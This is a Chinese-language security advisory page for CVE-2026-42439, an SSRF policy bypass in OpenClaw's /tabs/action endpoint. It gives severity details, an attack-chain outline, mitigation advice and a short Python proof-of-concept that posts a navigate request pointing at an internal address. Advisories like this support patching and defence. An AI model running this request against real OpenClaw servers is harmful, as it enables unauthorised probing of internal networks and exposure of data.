IPBUF安全漏洞报告
English
CVE-2026-42439 CVSS 8.5 高危

CVE-2026-42439 OpenClaw SSRF策略绕过漏洞

披露日期: 2026-05-05

漏洞信息

漏洞编号
CVE-2026-42439
漏洞类型
SSRF策略绕过
CVSS评分
8.5 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

SSRFOpenClaw策略绕过高危漏洞

漏洞概述

OpenClaw 2026.4.10 之前的版本在浏览器标签页操作路由中存在服务器端请求伪造(SSRF)策略绕过漏洞。攻击者可利用 /tabs/action 端点,绕过系统配置的 SSRF 防护策略,执行未经授权的标签页导航操作。该漏洞可能导致内网服务探测、敏感数据泄露等严重后果。

技术细节

该漏洞源于 OpenClaw 在处理浏览器标签页的操作请求时,未能正确验证和过滤用户输入。具体而言,在 /tabs/action 端点中,攻击者可以构造特殊的请求参数,利用标签页选择和关闭路由的逻辑缺陷,从而绕过应用程序层配置的 SSRF(服务器端请求伪造)防护策略。正常情况下,系统会拦截对内网地址的请求,但通过该漏洞,攻击者可以诱导服务器向受保护的内部网络地址发起请求,或执行未经授权的页面导航操作。由于攻击复杂度低且无需用户交互,该漏洞具有较高的安全风险,可能被用于扫描内网端口、访问受限资源或结合其他漏洞进行进一步攻击。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标正在使用 OpenClaw 且版本低于 2026.4.10。
STEP 2
2. 构造恶意请求
攻击者向 /tabs/action 端点发送特制的 POST 请求,包含指向内网敏感地址的 URL。
STEP 3
3. 执行 SSRF 攻击
由于存在策略绕过漏洞,服务器端应用执行了针对内网地址的请求,绕过了原有的 SSRF 过滤机制。
STEP 4
4. 获取敏感信息
攻击者根据返回的响应信息,判断内网端口状态或获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit PoC for CVE-2026-42439 # Target: OpenClaw < 2026.4.10 # Description: Bypass SSRF policy via /tabs/action endpoint target_url = "http://target-openclaw-instance/tabs/action" internal_target = "http://127.0.0.1:22" # Example internal target # Payload to bypass SSRF policy payload = { "action": "navigate", "url": internal_target, "tab_id": "existing_tab_id" # Requires a valid tab context } try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("SSRF Policy bypassed successfully!") print("Response:", response.text) else: print("Exploit failed") except Exception as e: print("Error:", e)

影响范围

OpenClaw < 2026.4.10

防御指南

临时缓解措施
如果无法立即升级,建议通过网络 ACL 限制对 /tabs/action 端点的访问,仅允许受信任的 IP 地址调用。同时,应严格监控服务器发出的出站网络流量,拦截对内网敏感地址的请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表